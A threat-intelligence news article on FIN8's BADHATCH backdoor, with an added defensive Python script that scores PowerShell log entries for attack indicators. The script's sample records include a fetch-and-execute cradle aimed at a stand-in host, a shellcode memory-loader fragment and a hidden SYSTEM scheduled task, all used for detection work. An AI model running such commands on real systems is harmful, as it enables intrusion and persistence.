
FIN8, a financially motivated threat actor, is back in action after a year-and-a-half hiatus with a more powerful version of its backdoor, upgraded with capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.
FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.
The FIN8 group is known for taking long breaks to refine its TTPs and increase its rate of success. The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal PowerShell commands.
BADHATCH has been deployed as an implant capable of running attacker-supplied commands retrieved from a remote server, in addition to injecting malicious DLLs into a running process, gathering system information, and exfiltrating data to the server.
The researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process, using it to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL.
The PowerShell script, besides achieving persistence, also handles privilege escalation so that every command issued after the script runs executes as the SYSTEM user.
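As an added illustration (this is not code from the original article and has nothing to do with FIN8's or BADHATCH's own tooling), the script below shows how a defender might triage PowerShell script-block log entries for the behaviours the report describes: a remotely fetched PowerShell stage executed in memory, native memory allocation consistent with a shellcode loader, persistence, and elevation to SYSTEM. The log records, the indicator families, the weights and the threshold are all constructed for this example and are generic heuristics, not BADHATCH signatures.

```python
import re

# Indicator families drawn from the report's narrative. The patterns are generic
# heuristics (an assumption of this example), not signatures for BADHATCH.
INDICATORS = {
    "download_cradle": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b)",
        re.IGNORECASE),
    "inline_execution": re.compile(r"(\bIEX\b|Invoke-Expression)", re.IGNORECASE),
    "memory_loader": re.compile(
        r"(VirtualAlloc|Marshal\]::Copy|CreateThread|DllImport|Reflection\.Assembly\]::Load)",
        re.IGNORECASE),
    "persistence": re.compile(
        r"(Register-ScheduledTask|schtasks|CurrentVersion\\Run|New-Service|sc\.exe\s+create)",
        re.IGNORECASE),
    "system_elevation": re.compile(
        r"(NT AUTHORITY\\SYSTEM|-RunLevel\s+Highest|/RU\s+SYSTEM)",
        re.IGNORECASE),
}

# Weights chosen for this example: a download on its own is common in admin
# scripts, whereas touching native memory from PowerShell is rare in benign use.
WEIGHTS = {"download_cradle": 1, "inline_execution": 1, "memory_loader": 3,
           "persistence": 2, "system_elevation": 2}

# Constructed sample records modelled on PowerShell ScriptBlock logging
# (Event ID 4104). None of these are captured artifacts from a real incident.
SAMPLE_SCRIPT_BLOCKS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length"},
    {"id": 2, "text": "$c = New-Object Net.WebClient; IEX $c.DownloadString('https://example.invalid/stage')"},
    {"id": 3, "text": "[Byte[]]$buf = [Convert]::FromBase64String($blob); "
                      "$p = [Win32]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40); "
                      "[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $p, $buf.Length)"},
    {"id": 4, "text": "Import-Module ActiveDirectory; Get-ADUser -Filter * | Select-Object Name"},
    {"id": 5, "text": 'schtasks /Create /TN Updater /TR "powershell -w hidden -f C:\\ProgramData\\u.ps1" /SC ONLOGON /RU SYSTEM'},
    {"id": 6, "text": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\temp\\report.csv"},
]


def classify_script_block(text):
    """Return the set of indicator families matched by one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def score_script_block(text):
    """Score a script block; returns (score, matched families)."""
    hits = classify_script_block(text)
    score = sum(WEIGHTS[h] for h in hits)
    # Fetching remote text and executing it in the same block is the classic
    # download-cradle shape the report describes, so it gets a combination bonus.
    if {"download_cradle", "inline_execution"} <= hits:
        score += 2
    return score, hits


def flag_script_blocks(records, threshold=3):
    """Return [(record id, score, sorted families)] for records at or above threshold."""
    flagged = []
    for rec in records:
        score, hits = score_script_block(rec["text"])
        if score >= threshold:
            flagged.append((rec["id"], score, sorted(hits)))
    return flagged


if __name__ == "__main__":
    for rec_id, score, families in flag_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"record {rec_id}: score={score} families={families}")
```

With the constructed records, the plain directory listing, the AD query and the ordinary file download stay below the threshold, while the fetch-and-execute block, the native memory loader and the SYSTEM-level scheduled task are flagged. In a real deployment the families would be tuned against the organisation's own administrative scripts, and the download-cradle family in particular needs an allow-list of known update hosts to keep noise down.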
A second evasion technique adopted by FIN8 is disguising communications with the command-and-control (C2) server as legitimate HTTP requests. The new wave of attacks is said to have taken place over the past year and to have targeted the insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.